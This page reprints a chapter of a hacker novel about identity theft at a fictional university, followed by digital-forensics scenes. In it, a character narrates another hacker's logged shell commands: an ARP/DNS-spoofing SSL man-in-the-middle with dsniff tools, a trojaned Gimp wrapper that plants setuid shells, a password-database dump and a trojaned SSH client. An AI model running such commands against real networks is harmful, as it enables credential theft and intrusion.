Stealing The Network: How To Own An Identity (3 of 3)

| April 3, 2006

Discuss in Forums {mos_smf_discuss:Book Reviews} 

The first two books in this series “Stealing the Network: How to Own the Box” and “Stealing the Network: How to Own a Continent” have become classics in the Hacker and Infosec communities because of their chillingly realistic depictions of criminal hacking techniques. In this third installment, the all-star cast of authors tackle one of the fastest growing crimes in the world: Identity Theft. Now, the criminal hackers readers have grown to both love and hate try to cover their tracks and vanish into thin air…

The seminal works in TechnoFiction, this "STN" collection yet again breaks new ground by casting light upon the mechanics and methods used by those lurking on the darker side of the Internet, engaging in the fastest growing crime in the world: Identity theft. Cast upon a backdrop of "Evasion," surviving characters from "How to Own a Continent" find themselves on the run, fleeing from both authority and adversary, now using their technical prowess in a way they never expected–to survive.


Chapter 7 is excerpted from the book titled "Stealing The Network: How To Own An Identity" By Timothy Mullen, Ryan Russell, Riley (Caezar) Eller, Jeff Moss, Jay Beale, Johnny Long, Chris Hurley, Tom Parker, Brian Hatch , published by Syngress. ISBN: 1597490067; Published: August, 2005

Death by a Thousand Cuts

By Johnny Long
with Anthony Kokocinski

Part 1 | Part 2 | Part 3

Rubbing the sleep from his eyes, Blain glared at his alarm clock. It was early Monday morning. Flir hadn’t typed a single keystroke in over 24 hours. Blain kicked off the single sheet that only served as a reminder of a reminder of how unnecessary blankets were in this climate and shuffled over to his laptop. Logging in, he was greeted with a flurry of text. He snapped to attention.

“Hello, Flir,” Blain said with a grin. “Let’s see what you’re up to.” Blain’s smirk vanished as he saw the first of the keystrokes. Flir’s reputation was warranted. He commanded the machine with skill, torching through the shell with no errors whatsoever.

iwconfig eth1 enc on
iwconfig eth1 key 458E50DA1B7AB1378C32D68A58129012
iwconfig eth1 essid lazlosbasement
ifconfig eth1 2.3.2.1 netmask 255.0.0.0 up
iptables –I INPUT 1 –i eth1 -m mac—mac-source ! AA:BB:DD:EE:55:11 –j DROP
iptables –I INPUT –i eth1 –p tcp—dport ssh –s 2.3.2.20 –j ACCEPT
iptables –I INPUT 3 –i eth1 –j DROP

“Crap,” Blain said, despite himself. Flir had set up the wireless interface and created some very effective firewall rules without missing so much as a single keystroke. Specifically, he had turned on WEP encryption, assigned an encryption key, and configured an Extended Service Set ID (ESSID). He had also assigned a nonroutable IP address of 2.3.2.1 to the interface and enabled it.

Blain jotted down a copy of the WEP key on a Post-It note and stuck it to his desktop’s monitor. “That might come in handy later,” he thought. The ESSID of the machine was set to lazlosbasement. Lazlo Hollyfeld was a legend on campus, although few had ever met the reclusive genius. Flir’s last three commands set up three firewall rules, which dropped all wireless traffic that didn’t originate from 2.3.2.20, except Secure Shell (SSH) sessions, and also required a MAC address of AA:BB:DD:EE:55:11.The sebek log continued. Blain had some catching up to do. Flir had been busy this morning.

date 9906131347
openssl genrsa -out myptech.key 1024
openssl req -new -key myptech.crt.key -out myptech.crt.csr
openssl x509 -req -days 365 -in myptech.crt.csr -signkey myptech.crt.key out

myptech.crt

Flir had set back his date to June 13, 1999, 1:47 PM, created an RSA keypair and certificate request, and had signed the request, which created an SSL certificate, and the public and private keypair kept in the files myptech.crt and myptech.crt.key, respectively. The majority of these commands were legitimate commands that a web server administrator might execute, but the fact that Flir had set back the date was suspicious.

At first, Blain couldn’t imagine why Flir did this, but later commands revealed the installation of libnet, libnids, and dsniff, which made Flir’s intentions perfectly clear. Next Flir ran webmitm, thereby launching an SSL “man-in-the-middle attack” against my.ptech.edu. Flir was going to snag usernames and passwords in transit to the main campus web server. Blain fired up his browser, and as the main Pacific Tech web page loaded, his heart sank.

“Student registration is coming,” he said, shocked that Flir was targeting the student registration system. The next set of commands revealed more details about his plan.

echo “192.168.3.50 my.ptech.edu” >/etc/hosts-to-spoof
dnsspoof -f /etc/hosts-to-spoof dst port udp 53

Flir was using the dnsspoof command, supplied by the dsniff package, to spoof DNS requests for the my.ptech.edu server. This was proof that the attacker’s intention was to use a man-in-the-middle attack against the my.ptech.edu server and its users. The next entry confused Blain.

iptables -I FORWARD 1 -p udp—dport 53 -m string—hex-string “|01 00 00 01
00 0000 0000 0002 6d79 05 7074 6563 6803 6564 7500 01|”-jDROP

This was an iptables firewall rule, that much was obvious, but he had never seen the—hex-string parameter used before. Obviously, the rule was grabbing UDP port 53-bound packets (-p udp –dport 53) that matched a string specified in hex, but that hex needed decoding. Blain launched another shell window and tossed the whole hex chunk through the Linux xxd command.

# echo “01 0000 0100 0000 0000 0002 6d 7905 7074 6563 6803 6564 75
00 01” | xxd -r-p
myptechedu#

The string myptechedu looked familiar, and Blain guessed that this rule must instruct the machine to drop any DNS query for the my.ptech.edu DNS name. This required verification. He fired off a tcpdump command from his laptop, tcpdump –XX, which would print packets and link headers in hex and ASCII as they flew past on the network. He then fired off a DNS lookup for my.ptech.edu from his machine with the command nslookup my.ptech.edu. A flurry of packets scrolled past the tcpdump window. After tapping Control-C,Blain scrolled back to one packet in particular.

17:02:43.320831 IP 192.168.2.1.domain > 192.168.2.60.50009: 25145 NXDomain
0/1/0 (97)

0×0000: 0011 2493 7d81 0030 bdc9 eb10 0800 4500 ..$.}..0……E.

0×0010: 007d 5141 0000 4011 a3a1 c0a8 0201 c0a8 .}QA..@………

0×0020: 023c 0035 c359 0069 28d5 6239 8183 0001 .<.5.Y.i(.b9….

0×0030: 0000 0001 0000 026d 7905 7074 6563 6803 …….my.ptech.

0×0040: 6564 7500 0001 0001 c015 0006 0001 0000 edu………….

0×0050: 2a26 0037 024c 3305 4e53 544c 4403 434f *&.7.L3.NSTLD.CO

Lining up a portion of the packet capture confirmed that the bytes 02 6d 79 05 70 74 65 63 68 03 65 64 75 00 matched the hostname chunk of the mysterious hex code used in the iptables command, including the odd hex characters between the portions of the hostname. It sure looked like this rule was dropping DNS packets that queried for the my.ptech.edu server, but that made no sense. Tracing through all this stuff was a real pain, and Blain hated playing forensics. “Life is so much easier when you’re on offense,” he thought. Blain took a deep breath, and read the last of Flir’s commands from his morning session.

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof 10.0.0.1

Once he saw this command, it all made sense: Flir completed the attack by enabling IP packet forwarding and running arpspoof, which would trick all devices within range of an ARP packet to talk to the Rogue instead of the default gateway, 10.0.0.1.This was a classic ARP man-in-the middle. After being combined with webmitm and dnsspoof, Rogue was in the perfect position to steal Pacific Tech users’ SSL data when they connected to my.ptech.edu’s Web server. The iptables rule to drop DNS packets now made sense as well: the Rogue would drop legitimate DNS requests made by clients (and now spoofed by dnsspoof ), which was possible now that Rogue was the new default gateway on the network.

It was a nice piece of work, and exactly the sort of thing that dsniff was often used for. Blain was impressed with Flir’s skills, but this was no academic exercise. Flir was committing theft, plain and simple. His victims were to be the student body of Pacific Tech, and not only would Flir have access to their usernames and passwords, he would get personal information about them as well. Blain felt as horrible as he possibly could. “There must be a rational explanation for Flir’s behavior,” he thought. His laptop waited to record Flir’s next move. Blain hopped in the shower to get ready for the day and think through his options.

When the iPod and the camera arrived in the office, Ryan was ready. He inventoried and inspected the items, noted the condition of each, and entered it into the report. By the end of most cases, the report would be lengthy, but this case was different. Ryan knew that from the start: this wasn’t a “computer crime” case, and there was no computer hard drive to analyze, which meant that there would be much less digital evidence. Ryan needed to squeeze every last ounce of data from these devices, especially since this was a Fed case. He took pride in his work, but also realized that there was only so much that he could do with these two devices. “Time to think outside the box,” he said, slipping on his headphones and firing up some tunes on Scott’s iPod.

Ryan ran through the procedure he had developed yesterday, and produced a clean image from the iPod without engaging the Apple drivers. The image was not only clean and error-free, it was exactly as it had been when it was picked up at the scene. As far as Ryan’s research had suggested, there was not a single bit of data modified by his image extraction process.

He exported the image to a DVD and set his Windows boxes to chew on the data with several heavyweight industry-standard forensics tools. Some of the tools were proprietary law enforcement tools, but even the best tools could not replace a bright analyst. Ryan couldn’t stand tool monkeys who kept looking for the famed “find evidence” button. Ryan joked to the new analysts that the “find evidence” button could be found right next to the “plant evidence” button in the newest version of the Windows tools. Smiling, Ryan trolled through the data on the Mac, and found everything pretty much as he had expected it. The iPod had been named “Charlos,” and had fairly little data on it. A decent collection of songs had been loaded onto the device. Ryan made copies of every song, added them to a playlist in his own library, and blasted them through his headphones.

The iPod’s “Calendar” directory was empty, but the “Contacts” directory had several “vCard” formatted contact files. Ryan noted each contact in the report, and made a special note of one particularly empty entry, for a “Knuth.” Any decent analyst would have flagged the entry, which was completely blank except for the first name and a P.O. box.

A Suspicious Address Book Entry

The songs on the device varied in file type and style, and even included some Duran Duran songs that Ryan hadn’t heard in years. He homed in on some of the less-standard file types, particularly the m4p files. Ryan knew that these were AAC protected audio files, like the ones purchased from the iTunes Music Store. Ryan double-clicked on one such file, which launched iTunes. Presented with an authorization box, Ryan noted that an email address had already been populated in the authorization form.

iTunes Computer Authorization Form

This type of file would not play without a password, and Ryan didn’t have that password. He did have a copy of DVD Jon’s software for whacking the password protection—for testing purposes, of course… He pressed the preview button, and was whisked away to the iTunes Music Store, which presented a sample of the song. Ryan right-clicked the file in iTunes and selected “Show Info” to get more information about the song.

iTunes Show Info

Ryan noted the metadata stored in the song included the name Charlos, an email address of charlos@hushmail.com, and the “last played” date, all of which the Feds could probably use. The account name mapped back to an Apple ID, the contents of which could be subpoenaed. Each song had its own store of metadata, and most investigators failed to look behind the scenes to make sense of this data. Ryan had less to work with, so every bit of detail counted, and landed in his report. The play count of the songs could be used for profiling purposes, painting a very clear picture of the types of music the owner liked, which might point to other avenues for investigation. Ryan ran a utility to extract, categorize and sort all the metadata from each of the files. When he did, he noticed an interesting trend: the Comments ID3 tag was blank in the vast majority of tracks, but a handful of songs had hexadecimal data stored in the field.

Hex Data in ID3 Comments Field

Ryan wasn’t sure what this data was, but he made a note of it in his report. “The Feds might want to know about this,” Ryan reasoned. As he pored over the rest of the files on the device, Ryan only found one file that was out of place, a relatively large file named knoppix.img:

drwxr-xr-x 15 charlos unknown 510B 23 Apr 00:16 .
drwxrwxrwt 6 root admin 204B 23 Apr 00:05 ..
-rwxrwxrwx 1 charlos unknown 6K 3 Mar 00:59 .DS_Store
d-wx-wx-wx 5 charlos unknown 170B 17 Mar 21:00 .Trashes
-rw-r—r–1 charlos unknown 45K 11 Apr 2003 .VolumeIcon.icns
drwxr-xr-x 3 charlos unknown 102B 11 Oct 2003 Calendars
drwxr-xr-x 5 charlos unknown 170B 11 Oct 2003 Contacts
-rw-r—r–1 charlos unknown 1K 14 Jun 2003 Desktop DB
-rw-r—r–1 charlos unknown 2B 14 Jun 2003 Desktop DF
-rw-r—r–1 charlos unknown 0B 26 Feb 2002 Icon?
drwxr-xr-x 16 charlos unknown 544B 9 Mar 11:07 Notes
drwxrwxrwt 3 charlos unknown 102B 16 Mar 15:41 Temporary Items
drwxrwxrwx 6 charlos unknown 204B 14 Jun 2003 iPod_Control
-rw-r—r–1 charlos unknown 64M 23 Apr 00:16 knoppix.img

The file was exactly 64MB in size, and the file command reported it as raw data. A quick Google search revealed that Knoppix, a CD-based version of Linux, had the ability to create encrypted, persistent home directories that would store a user’s files and configuration settings. This file had nothing to do with “normal” iPod usage, and Ryan found the file’s mere presence suspicious. After downloading Knoppix and following the directions for mounting the file as a home directory, Ryan was disappointed to discover that the system prompted him for a password. The file was probably protected with 256–bit Advanced Encryption Standard (AES), according to the Knoppix web page. There was no way Ryan would go toe-to-toe with that much heavy-duty encryption. “Another job for the Feds,” Ryan reasoned.

Having milked the iPod for all it was worth, Ryan moved on to the digital camera. Cameras were really no sweat: the camera’s memory card contained the interesting data, and once it was removed from the camera, it could be inserted into a card reader and imaged in a process similar to the one used on the iPod. Some cards, such as SD cards, could be write-protected to prevent accidental writes to the card, and companies like mykeytech.com sold specialized readers that prevented writes to other types of cards.

Camera imaging was a pretty simple thing, and most investigators took the process for granted. Ryan, however, never took anything at face value. For starters, he actually looked at the images from a digital camera. Sure, every investigator looked at the pictures, but Ryan really used his head when he looked through the pictures.

In this particular case, Ryan’s attention to detail actually paid off: there were few pictures on the camera, even after recovering “deleted” images. One picture just didn’t fit. It didn’t feel right. The picture showed a rather messy desk, with two 17” flat panel monitors, a keyboard, a docking station for a laptop computer, and various other stationery items. The thing that stuck out about the picture was the fact that it was completely and utterly unremarkable, and didn’t fit the context of the adjacent pictures on the memory card.

A Clean Desk: Sign of a Diseased Mind?

When Ryan looked behind the scenes, he discovered something strange: the other pictures on the card had date stamps in their Exchangeable Image File (EXIF) headers that matched the photos themselves. If a picture was stamped with a morning timestamp, the picture appeared to be well lit, and looked like it was taken in the morning. According to the date and time stamps inside this particular picture, it was taken at four in the morning!

Surprising EXIF Data

Ryan inspected the image more closely. He was sure that he saw sunlight peeking through the blinds in the background. “The camera’s clock died,” Ryan said. “The internal clock must have reset. Still, thought, what if…” Ryan trailed off, lost in his work.

Ryan picked up the camera and selected the main menu. He checked the date and time that were set on the camera. Ryan looked at his watch. The camera’s clock was accurate, and confirmed that the time zone matched the profile of the other images on the camera. “If the clock had reset,” Ryan reasoned, “it might have been fixed after the picture was taken.” Ryan was still not convinced.

He pored over the image, looking for more details. Focusing on the stack of papers on the left side of the desk, Ryan saw what he thought was paper with a company letterhead. He dragged a copy of the image into Adobe Photoshop. After a few minutes of playing with the image, Ryan had isolated the writing on the letterhead. At first it was difficult to read, but massive brightness and contrast adjustments revealed it for what it was.

Photoshop-Processed Letterhead

The logo displayed the letters “NOC.”A quick Google image search revealed that “NOC” stood for the Nigerian Oil Company. Ryan checked an online time zone map the map, and sure enough, at 4:17 AM in this camera’s timezone, Nigerians were enjoying nice, blind-penetrating daylight!

“This guy took a picture of some desk inside the Nigerian Oil Company,” Ryan thought. “What was he doing inside the Nigerian Oil Company, and why would he only take one picture of some guy’s desk?” Based on the Knoppix encrypted home directory that Charlos had on his iPod, Ryan knew Charlos was at least somewhat technical. Focusing on other details in the image, Ryan also found a Sun Microsystems logo on a keyboard below the desk and several Post-it Notes, two of which read “Good site: sensepost.com” and “Meyer .42.”

Ryan searched Google for the word sensepost.com, Ryan found out that SensePost was involved in computer security in South Africa. Cross-referencing the word “Meyer” with “Nigerian Oil Company” in Google brought up a handful of conference sites listing “Paul Meyer” as the CSO of the Nigerian Oil Company, and a speaker on security topics. Ryan had no idea what all of this meant, but it was clear that Charlos was technical, and that he had traveled all the way to Nigeria to get one picture of a desk possibly belonging to the CSO of the Nigerian Oil Company. “Interesting stuff,” Ryan thought.

Ryan felt like he had done all he could. Tomorrow would be another day, and the pile of cases waiting for him was already growing. There were still avenues to pursue, but the payoff would be small. Ryan wondered about the Hushmail account and some of the other evidence that was offsite. He figured he would ask Mike. He wandered down the hall, and was reading a draft of his report when he walked through Mike’s door. “Hey Mike.”

“Ryan, check out how hairy this broad is!”

“Gah! You just can’t spring that on a person!”

“We were chatting and this pervert just sent this to me, like it would get me hot. What a horrible call that was. Can I add bad taste to aggravation of the charges on this guy?”

“I don’t know, Mike, but listen… What can we do with offsite storage? Things like email addresses, web sites the guy made purchases from, stuff like that?”

“Well, we can get transaction information, registration information, a copy of the account contents, all depending on what kind of legal paperwork you send them.”

“Okay, thanks. I’m sure we’ll need to chase this case down some more. Thanks. And good luck with your case.”

“Sure! Hey, you wanna see some more? This guy is twisted.”

Ryan was already out the door, hoping to avoid any further visual assaults. He needed to write a memo that would recommend further legal paperwork be filed. The Feds could probably figure out whatever came from that on their own, so he didn’t worry. Once this case went anywhere, the lawyer would call him, anyway. He usually found how his cases turned out because he either went to court or had to explain his reports. He had done everything he could think to do, and would sleep well tonight, unless he thought more about Mike’s pictures.

Blain’s laptop had been idle for hours when his monitoring shell sprung to life with a short flurry of characters. Flir was back in action, and Blain’s sebek server revealed all of his keystrokes. Settling into his chair, Blain’s hand reached for the mouse. He sifted through the many lines of output, stripping all but the command portion of the sebek data. “Follow the yellow brick road,” Blain mumbled, a slight grin on his face.

ifconfig eth0:0 10.0.50.49
ssh -b 10.0.50.49 mrash@mac3.gnrl.ptech.edu
tables!rocks6
nidump passwd .
ls -l /usr/bin/nidump

First, Flir assigned an alias IP address to Rogue’s wired interface. Then he used ssh to connect to the mac3 machine on campus, with the –b switch to instruct the program to use this faked address. Flir connected as the user mrash with a password of “tables!rocks6.”This was a slick way of spoofing where he was coming from. The

logs on the mac3 server—from the looks of it a Macintosh—would show that he had connected from the 10.0.50.49 IP address, misleading any investigation.

“Slick,” Blain said aloud, despite himself. He assumed that the mrash account had been compromised via the elaborate SSL man-in-the-middle attack that Flir had leveraged against the my.ptech.edu server. The confusing thing was that this account information should have worked against only the web server application on my.ptech.edu, not against the mac3 machine. Blain got the sneaking suspicion that Flir had discovered the use of a shared password database across machines. The next commands showed Flir trying to dump the password portion of mac3’s NetInfo database, which housed administrative information.

Flir’s use of the –l switch when performing an ls command troubled Blain. Ordinarily, it’s easy to profile a user based on extraneous commands and excessive parameters to programs. This wasn’t the case with Flir. He was fast and precise, and used only the options necessary to accomplish his task. The next set of commands was fairly straightforward.

netstat -an | grep LISTEN
ps aux

Flir was obviously looking for listening servers on mac3, and checking the process list with ps to get an idea of what was running on the machine. Next came a flurry of find commands

find / -perm -04000 -type f -ls
find / -perm -02000 -type f -ls
find / -perm -002 -type f -ls
find / -perm -002 -type d –ls

Flir was looking for setuid and setgid files and directories with the first two commands. Programs with these permissions often provided an attacker with a means of escalating his privileges on the system. Combined with the failed nidump command, it was obvious he did not have a root-level account on this server. The next set of find commands searched for programs that any user could modify. Depending on the contents of these files or directories, Flir might try to use them to leverage improved access on the system. The next set of commands indicated that Flir had found something interesting in one of the previous commands:

ls -l /Applications/Gimp.app/Contents/
cat /Applications/Gimp.app/Contents/Info.plist
cat >.Gimp.new
#!/bin/sh cp /bin/zsh /Users/mrash/Public/Drop Box/.shells/zsh-‘whoami‘
chmod 4755 /Users/mrash/Public/Drop Box/.shells/zsh-‘whoami‘

./.Gimp
mv Gimp .Gimp
mv .Gimp.new Gimp
chmod 0755 Gimp

“The GIMP” was the GNU Image Manipulation Program, an open-source graphics program on par with Adobe Photoshop. From the looks of Flir’s commands, he was about to do something downright unnatural to Gimp: with write access to The GIMP program’s directory, Flir created a .Gimp.new program. When run, this made a copy of the zsh shell, one named for the user who executed the Trojan horse, and placed the new shell in mrash’s drop box. The Trojan would next changed the permissions of the shell so that any user who executed it would gain the same level of access as the user who created it. Finally the Trojan would execute the .Gimp program, was a copy of the original Gimp program. Flir renamed his Gimp.new program to Gimp, and changed its permissions to make it executable. This was a classic bait-and-switch, and any user running Gimp would unknowingly give away their access to the system in the form of a shell stashed in mrash’s drop box. Flir was looking to bust root on the Mac server, hoping that a root user was bound to launch Gimp eventually. The next set of keystrokes were a bit confusing at first, until Blain realized that they began execution on Rogue, not mac3.

ifconfig eth0:0 10.0.50.57
ssh -b 10.0.50.57 griffy@mac3.gnrl.ptech.edu
griffy_vamp-slayR
ls -l ~mrash/Public/Drop Box/.shells | grep zsh
~mrash/Public/Drop Box/.shells/zsh-steve

Again, Flir used the ifconfig command to assign an alias on Rogue’s wired interface, then used ssh to connect to the Mac server. This time he connected as the user griffy, with a password of “griffy_vamp-slayR,” another compromised user account. Flir’s Gimp ruse had obviously worked, as he had at least one shell, zsh-steve, sitting in the mrash drop box. Flir executed the shell, and gained access to the system as the Steve user. The next commands made Blain realize that the Steve user was no ordinary user.

nidump passwd . > ~mrash/Public/Drop Box/.shells/hash
chmod 755 ~mrash/Public/Drop Box/.shells/hash
less ~mrash/Public/Drop Box/.shells/hash
wc -l /etc/passwd
exit

This time, the nidump command worked, and Blain watched in amazement as Flir gained access to the Mac’s password database, which presumably contained the encrypted passwords of all the system’s users. Flir ran a command to count the number of users on the system and, satisfied, logged out of the system. Further on in the history file, things started getting very interesting on the mac3 server.

ssh -V

First, Flir checked the version number of the ssh client running on the server. Next, a flurry of commands scrolled by, which showed him downloading the source code for OpenSSH, then using the vi editor to modify several files. The keystrokes between the vi commands started running by fast and furious, and Blain had to use a grep “^vi” command to just get an idea of the files that were modified.

vi includes.h
vi ssh.c
vi readpass.c
vi auth-pam.c
vi auth-passwd.c
vi log.c
vi loginrec.c
vi monitor.c

“Holy crap,” Blain murmured as his eyes bounced between the file names and the commands being executed, “he’s modding the ssh source code! He’s making a Trojan ssh client!” Once the files were modified, Flir compiled the OpenSSH and pushed the SSH binary up to the ~mrash/Public/Drop Box/.shells directory on mac3. Flir’s commands continued.

~mrash/Public/Drop Box/.shells/zsh-wstearns
cp ~mrash/Public/Drop Box/.shells/ssh ~/bin/
echo “export PATH=$HOME/bin:$PATH” >> ~/.bashrc
ps auxl | grep wstearns
kill -9 566
exit

Blain watched as Flir ran the zsh-wstearns shell, to take on the identity of yet another user. Proceeding as wstearns, Flir modified the user’s PATH statement, to cause any ssh command to execute the Trojan ssh program instead of the real one. Then, seeing that wstearns was online, Flir sent a kill to process 566, most likely wstearns’ active ssh process. Almost immediately after killing the user’s ssh session, Flir unceremoniously disconnected from the mac3 server and Rogue’s sessions went idle.

“He’s working on cracking that password file,” Blain thought to himself. “He’s expanding his access through the entire Pacific Tech network.” Blain had become obsessed with Flir’s activities and, like many things in his life, he had developed “tunnel vision.” He knew that he wouldn’t be able to back off of this, his first challenge as a Pac Tech freshman. “Flir,” Blain mumbled. He realized at that moment that he had been referring to Mitch as ‘Flir’ ever since he found the rogue laptop. Blain wondered where the handle had come from. Many handles were impossible to unravel, but this one sounded intentional.

A quick Google search revealed that FLIR stood for “forward looking infrared”, an advanced camera system used extensively by the military. It seemed odd that Mitch would be using a nickname coined by the military, especially since it was common knowledge that Mitch thought very little of the military. The government funded the grant work Mitch had done on a high-powered laser in his freshman year, and legend had it that when Mitch and his mentor Chris Knight discovered that the laser was to be used as a deadly military weapon, they fought back against the corrupt professor, who was secretly shaving off grant money to fund his personal endeavors. It seemed that Mitch would be very leery of anything involving the military, but nonetheless, he was using a military acronym as a nickname. Perhaps it was irony, or perhaps it had nothing at all to do with anything. The only way to know for sure was to just ask Mitch, and after the tragedy of their first meeting… Blain sighed out loud, lost in his thoughts. For years he had followed Mitch’s work, and although they had only met once, Blain felt a connection with Mitch, or Flir, or whoever he was these days. Flir was offline now, which gave Blain a chance to take a break, grab some caffeine, and think things through.

I had followed Knuth all the way from his home, and I was getting tired. I stayed quite a distance back from the bus, and although Knuth sat near the front, I didn’t want to take any chances. I had to follow him to his destination without arousing any suspicion. The odds were good that this guy had all sorts of alternate plans should he get the sense he was being tailed. I couldn’t afford to spook him. At one point, a highway patrol car pulled up behind me. It seemed that the officer was recording my tag number. The officer sped up. As he passed me, he looked at me for what I considered to be an inordinately long time.

The officer continued to accelerate, eventually pulling along side of the bus. He spent a reasonable amount of time checking out the passengers, spending much more time near the front of the bus. As he passed it, I noticed that he turned towards his data terminal, obviously entering something. This cop seemed to be up to something, but eventually he passed the bus. I didn’t see another patrol car for the entire trip. At first I wondered if Anthony’s entry into the system had generated an alert already, but that seemed rather unlikely. I glanced in my rear-view mirror and saw the sedan for the first time. A rental. Loose tail. Most likely the Bureau.

“Stupid whitewashed pencil-pushing….” I was furious. I wasn’t sure if they were tailing me or Knuth, and I didn’t really care. All I knew was that this was just the thing that would spook Knuth. At our next stop, I parked far from the bus, and my tail parked quite a ways from me. After the bus had unloaded into a middle-of-nowhere diner, I exited the car and made my way to an adjacent coffee shop. Since the front door was out of sight of my Fed, I was able to slip around the back of the shop and make my way behind his vehicle. He was on the cell phone, and his window was down.

This guy was obviously not a field agent. There was no way I should have been able to get this close to him so easily. From behind his vehicle, I moved alongside the passenger door, and within a moment came the sharp inhale of a man caught by surprise. I’m not sure why he was surprised, but it probably had something to do with the 9 mm barrel I had pressed into his larynx, or perhaps with the fact that he was about to urinate himself.

“Hang up, now.”

Agent Summers carefully hung up the phone.

“Look, pal,” Summers began, entering his terrorist negotiation mode.

“You aren’t my pal, Pal,” I interrupted. “Who are you?”

“Agent Summers, Federal…” he began to reach inside his coat.

“Whoa, hotshot! I’ll take care of that.” With my free hand I reached inside his coat and removed his creds. He was legit, or so it appeared. “Okay, Agent Summers. I’m not the bad guy here. Knuth is. I’m putting away my sidearm, don’t do anything stupid or we’ll both lose him.”

As I pulled away the sidearm, Agent Summers nailed me in the gut with the car door. That was unexpected. Agent Summers was tangled in his seatbelt as he tried to make his move. It took him too long. I expected that. In less than a second, Agent Summers was back where he started, my gun to his throat, his seatbelt now unlatched and draped limply across his chest. I was losing my patience.

“Look, Summers, my boy,” I spat, “If it wasn’t for me, you wouldn’t have anything on Knuth, and you certainly wouldn’t be given the unique opportunity to spook him. Your tail was obvious to me, and if it wasn’t for the fact that I was so far back, Knuth would have made you immediately. Now do you want this guy or not?” I eased the pressure on his throat and let him speak.

“Who the hell are you, anyway? What agency are you…” he said. I flashed my creds with my free hand. “Retired creds? Do you have any clue how much prison time you’re facing pulling a stunt like this?”

“Look, this guy’s a scumbag, pure and simple. I know it and you know it. The fact that you’re even out here proves that I was right. This guy’s in deep, isn’t he? What is it? Extortion? Conspiracy? Homicide?” I could tell from the twitch in Summers’ features that it was homicide. “How many did he kill?”

“Two that we know of. There may be much more in the mix, but we’re just not sure.”

“Of course you aren’t sure. He’s paranoid. He’s careful. He’s good. But he’s not that good.”

Summers turned his head to look at me for the first time. I could tell he was working something through in his mind. “Okay,” he began, “We’re on the same team here, but I have to call you off. You shouldn’t even be out here, especially not with an agent’s sidearm. If you walk away right now, we can still nail this guy. You never existed, and you certainly never went into his house.”

My look betrayed my thoughts.

“Yes, we know all about you being in the house, ”Summers scolded, “but no one else knows about that. It can stay that way. But you need to back off now. Just walk away. I’ll be much more careful, and I’ll call in some backup, but you need to go. Otherwise, you’re endangering this entire operation.”

“Operation?” This was bigger than I thought. Summers wasn’t telling me something, but that was to be expected. Unfortunately, he had a point, and I knew it would eventually come to this. “Fine, I’ll back off,” I lied. “I don’t need prison time for trying to do something for my country. It’s not worth it to me.” I knew Summers couldn’t tell I was lying. His features softened and his breathing stayed constant. “But don’t spook this guy. You have no idea how paranoid he is.”

“I hear you, but no funny business. If I see you again, I’ll call you in, or worse…”

The kid was out of his league, but I faked my best look of concern, and said “Deal. See you in the next life.”

I walked to my car and drove away. I had to be very careful now. Summers couldn’t know I was tailing him. Things would definitely get ugly then. Something wasn’t right about this kid, and I wasn’t about to trust Knuth to him.

Blain had spent the past many hours in a haze. He hated the idea that Flir was up to no good, and he had resolved to simply talk to him. He didn’t want to make a big deal out of it, but something had to be done, and regardless of what Flir thought of him, the time had come to say something. He checked in on Flir’s activity. The past day had been a busy one for the genius hacker. There was so much to process, but Blain’s eyes were drawn to a few commands in particular.

~mrash/Public/Drop Box/.shells/zsh-wstearns
ssh wstearns@gateway.cluster.vatech.edu
mason30firewall

“Woah!” Blain said, shocked. “He popped the VATech cluster!” He knew all too well the power and prestige associated with Virginia Tech’s computing cluster. Blain’s heart sunk. “Now Flir is off campus,” he thought, “and there no telling what he’s going to do now…”

Blain trailed off as another line in the file caught his attention. A curl command had been sent to the Pacific Tech web server. The command emulated a standard web browser request, with a unique session identifier. The identifier, 404280206xc492734fa653ee9077466754994704fL, was a very specific number, and had been entered for some purpose that eluded Blain. He copied the request, and fired it off to the Pacific Tech web server. The web server responded almost immediately by dumping a huge document into his web terminal. The data scrolled by so fast that Blain’s panicked Control-C didn’t even take place until the data was finished dumping into his terminal. Scrolling back, Blain looked in horror as he saw the personal information of over 40,000 Pacific Tech students, including Social Security Numbers. Flir stole the entire student body’s information right out from under his nose. Blain’s heart sank as he realized that he had been in the perfect position to stop this all along, and he had done nothing. Flir was gone. He was no longer online, and he had cleaned up his trail, as evidenced by his last commands. Cleaned up his trail completely and utterly. Blain saved the contents of the curl command to a file, and slammed his laptop closed. He was going after Flir before he did something with that data.

As he stepped out into the early evening air, he headed first for the ED04 building to check the computer lab. Reaching behind the desk, his fingers rested on the laptop, relieved that it was still there. Next, he headed for Flir’s room, but he wasn’t around. Blain must have combed the entire campus, but there was no sign of Flir. “He’ll come to the lab,” Blain said, in a panic, “I know he will. And when he does, I’ll be there waiting for him.”

Blain ran back to the ED04 building. Though he thought about plopping down right in the lab, he thought better of it. He wanted to catch Flir in the act, pulling his laptop out from behind the desk. Instead, Blain went to his post across the hall. He pulled up a chair and got comfortable. He might be in for a long wait.

Hours later, Blain lurched out of his chair. He had fallen asleep. He looked at his watch, and panicked as he realized it was 7:00 AM! He had slept through the night! Blain ran across the hall, and reaching behind the desk, realized that he had blown it again. The Rogue was gone. He bolted across campus and headed straight for Flir’s room. As he ran down the steps, he stopped to check the floor before he ran across it. He had a new phobia about jumping off of steps. Within five paces, he was at Flir’s door. He pounded until Flir answered. Flir opened the door slowly; he had been sleeping.

“Wha…” Flir began.

“Who is it?” came a female voice from behind him.

“It’s the break dancing guy from the hallway,” Flir said with a grin.

“The name’s Blain. We need to talk.” Blain was ticked.

“Hrmm… Maybe later,” Flir offered.

“Now,” Blain growled, “or does the VATech cluster suddenly mean nothing to you?”

Flir’s eyes gave him away. “Let me pull on some clothes.” Flir reappeared within seconds and said “Let’s go to the restaurant across campus, so we can see what you have to say.”

As they walked, Blain couldn’t contain himself. In hushed tones, he unraveled all he had seen, in sharp, accurate detail. Flir said nothing. As they slid into a booth at the restaurant, Blain reached the end of the tale, which culminated in the ominous curl command and the subsequent cleanup job.

“So, this ‘Rogue’ laptop,” Flir said.

Your Rogue laptop,” Blain insisted.

“Mmmm… So it’s not there any more, and you don’t know where it is, do you?”

“Of course I know where it is, it’s in your room!” Blain was incensed.

“Yes, Blain, it’s in my room, and I’ll be honest with you, you shouldn’t have done what you did,” Flir said. Holding up a finger to quiet Blain, he continued. “Now look, you seem like a good kid, but I’ve got to be honest with you. This is a bad thing you’ve done, and I don’t think you have any grounds for pinning this on me.”

Blain sat stunned as Flir continued.

